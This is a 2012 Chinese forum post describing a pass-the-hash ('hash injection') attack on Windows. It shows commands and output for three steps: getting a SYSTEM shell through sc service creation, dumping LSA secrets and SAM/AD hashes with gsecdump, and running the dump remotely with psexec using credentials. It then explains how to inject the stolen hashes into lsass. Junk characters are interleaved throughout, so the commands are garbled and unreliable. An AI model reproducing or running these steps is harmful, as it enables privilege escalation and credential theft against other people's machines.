找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1970|回复: 0
打印 上一主题 下一主题

HASH注入式攻击

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-6 21:09:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
o get a DOS Prompt as NT system:7 ~. K+ S1 i  \
1 l1 `* y: b% T1 ^9 m& {
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
8 U+ D, e2 S: X6 L% B[SC] CreateService SUCCESS
: ^* n6 ~; Z- D4 I' A5 s8 f
8 g1 w4 Z9 |4 S, ~* zC:\>sc start shellcmdline
! n; p( o3 n2 O$ }. a9 O[SC] StartService FAILED 1053:$ k+ E8 ]: G. x" q, R  O

: t, w% [9 u: @' n' c0 ]The service did not respond to the start or control request in a timely fashion.0 T9 V$ b7 B! E; h6 U1 V0 H
& N  n+ {* a6 d
C:\>sc delete shellcmdline
. w( X9 G' r9 O0 j. d[SC] DeleteService SUCCESS
( |# E; V1 g1 i( [5 f8 }! e( P& ?
/ e( o0 z/ z% y; J0 z, m------------, o7 i; y+ }2 E3 k8 j
, O, }& O  L1 J: J2 l
Then in the new DOS window:
9 C3 N( g- f; |( V( m, }
/ p  u6 i; {) T' UMicrosoft Windows XP [Version 5.1.2600]
/ A% v2 A; u* T* O(C) Copyright 1985-2001 Microsoft Corp.
2 K! D! H2 N# ^
/ Z9 o+ ~1 K/ _+ y0 `; ?6 fC:\WINDOWS\system32>whoami) \/ v$ B1 C& a0 ^
NT AUTHORITY\SYSTEM
" c- ]+ ?1 t; O. H$ `3 O
& `2 `$ s% T$ g7 w  U  uC:\WINDOWS\system32>gsecdump -h
1 Q3 {9 N2 B* f  y. q5 e! fgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
; B* H7 d; w# Musage: gsecdump [options]7 ?9 Q5 z9 [% E) [

& w, C3 q! T5 i0 H, Moptions:
" x9 Z  b& j% H! B% h-h [ --help ] show help
" O9 W4 D4 c' F0 T3 R/ t-a [ --dump_all ] dump all secrets, \1 w  i+ @# r9 X/ S) n  n  L! ?
-l [ --dump_lsa ] dump lsa secrets
# L$ R5 y. D+ D8 |8 `9 A-w [ --dump_wireless ] dump microsoft wireless connections; l0 r- I: s" X+ Z" q* \
-u [ --dump_usedhashes ] dump hashes from active logon sessions  D6 q- g" F/ f/ ?* \- y( [0 i
-s [ --dump_hashes ] dump hashes from SAM/AD5 w0 Y2 Q$ K- a0 ^" f4 }

! v" A/ g, M7 u/ l4 T. d/ gAlthough I like to use:5 ]7 @" M1 B) p  a
; K3 o6 n& c$ ]' W1 }% X
PsExec v1.83 - Execute processes remotely
$ ^9 M# P* ^8 J3 ^3 x% a! aCopyright (C) 2001-2007 Mark Russinovich6 f- n: p; N' g, f7 H6 O7 B
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
' U: E6 y2 C& r: ^+ I. M' ^1 a- b, W' S
9 }: C! g" b1 U6 m$ ]C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
* k+ x1 F0 Y/ Y# i/ ?
* J8 E/ y$ @4 q# n2 F% t3 _to get the hashes from active logon sessions of a remote system.* O  K0 u4 p$ k! t9 k. O; X$ i

5 Q* u5 B; b% YThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.% n3 o2 c; |# D0 L

3 M$ j& f- }! |8 ^3 g提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.2 |9 S0 Z' y: `6 p" [/ K3 w
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
( {3 y' V$ W4 N- O
' S3 X4 I# ]) o我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
! w; l; n: v3 ]8 w( M
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表